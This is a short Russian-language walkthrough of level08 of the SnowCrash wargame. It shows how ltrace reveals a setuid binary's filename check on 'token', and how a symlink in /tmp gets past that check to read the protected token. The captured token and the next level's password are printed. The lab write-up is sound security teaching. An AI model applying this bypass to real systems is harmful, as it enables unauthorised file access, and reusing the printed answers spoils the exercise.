-Посмотрим файлы. Видим экзекьютбл и токен

level08@SnowCrash:~$ ls -l
total 16
-rwsr-s---+ 1 flag08 level08 8617 Mar  5  2016 level08
-rw-------  1 flag08 flag08    26 Mar  5  2016 token


-Взглянем на экзекьютбл через ltrace

level08@SnowCrash:~$ ltrace ./level08
__libc_start_main(0x8048554, 1, 0xbffff6e4, 0x80486b0, 0x8048720 <unfinished ...>
printf("%s [file to read]\n", "./level08"./level08 [file to read]
)       = 25
exit(1 <unfinished ...>
+++ exited (status 1) +++


-Файл ждет аргумент, подставим token

level08@SnowCrash:~$ ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff6e4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                         = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)     = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++


-Экзекьютбл открывает файл, поданный в аргументе, затем печатает его содержимое в вывод, причем проверяется, есть ли token, если есть, то программа завершается. Создадим ссылку на token и попробуем снова запустить

level08@SnowCrash:~$ ln -s ~/token /tmp/kek
level08@SnowCrash:~$ ./level08 /tmp/kek
quif5eloekouj29ke0vouxean
level08@SnowCrash:~$ su flag08
Password: 
Don't forget to launch getflag !
flag08@SnowCrash:~$ getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
flag08@SnowCrash:~$ su level09
Password: 25749xKZ8L7DkSCwJkT9dyv6f


